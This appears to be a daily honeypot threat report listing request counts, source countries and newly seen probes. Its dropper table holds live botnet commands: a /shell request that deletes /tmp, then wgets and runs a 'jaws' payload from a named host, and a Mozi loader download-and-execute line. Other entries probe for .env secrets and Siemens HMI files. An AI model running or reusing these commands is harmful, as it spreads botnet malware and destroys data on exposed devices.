Skip to main content
  1. Daily-Posts/

Report: 2025-07-14

·448 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-14
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 27 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1062 requests were recorded during the day, originating from 6 different countries, with a peak of 300 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
DEGermany
GBGermany
USDubai
NLIsrael
MDIsrael
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
8.209.205.188GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.133.204GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
180.76.121.16GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
103.207.224.24927;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
8.213.220.43GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
117.72.211.135GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
483GET /api/.env.live HTTP/1.1
503GET /app/.env.conf HTTP/1.1
533GET /api/.env.orig HTTP/1.1
543GET /app/.env.smtp HTTP/1.1
553GET /admin/.env.js HTTP/1.1
583GET /auth/.env.bak HTTP/1.1
593GET /api/.env.smtp HTTP/1.1
673GET /websockify HTTP/1.1
842GET /backend/.env~ HTTP/1.1
862GET /app/mail/.env HTTP/1.1
2131GET /odinhttpcall1752459022 HTTP/1.1
2151GET /OdinHttpCall1752459022 HTTP/1.1
2161GET /Odin/http/call1752459022 HTTP/1.1
2361\x00\x0E\x08\xF7’i\xDC?\x93\xE2\x1B\x00\x00\x00\x00\x00
2371\x00\x0E8\xF7’i\xDC?\x93\xE2\x1B\x00\x00\x00\x00\x00
2421\x00\x0E\x08\xA8 \xD0I\x1C\x06\xDB\x05\x00\x00\x00\x00\x00
2431\x00\x0E8\xA8 \xD0I\x1C\x06\xDB\x05\x00\x00\x00\x00\x00
2631\x04\x01\x00P\xC4\xFBt\xA2\x00
2641CONNECT 196.251.116.162:80 HTTP/1.0
3261GET /app/jobs/.env HTTP/1.1
3271GET /api/.env.conf HTTP/1.1
3301GET /clientes/.env HTTP/1.1
3331GET /auth/.env.crt HTTP/1.1
3541GET /wwwSiemens HTTP/1.1
3551GET /wwwSiemens/Rt/RecipeImpPath/ HTTP/1.1
3561GET /wwwSiemens/Rt/FwxPath/ HTTP/1.1
3571GET /wwwSiemens/Rt/FwxPath/pdata.pwl HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0300GB
1203US
2112CN
364HK
459DE
553PL
652CA
731BG
828NL
923ZA
1020MD
1114AU
1211SC
137AO
146MU
156BE
166CH
175JP
185UA
195PT
204SG
214IN
224RU
234BR
243TH
253LT
263KZ
272TR
282IL
292BY
302FR
312EE
322KR
332RO
342MC
352ID
362VN
372IE
381CZ
391AZ
401MY
411BD
421SE

Related

Report: 2025-07-13
·322 words
Repport Daily
Report: 2025-07-12
·389 words
Repport Daily
Report: 2025-07-11
·371 words
Repport Daily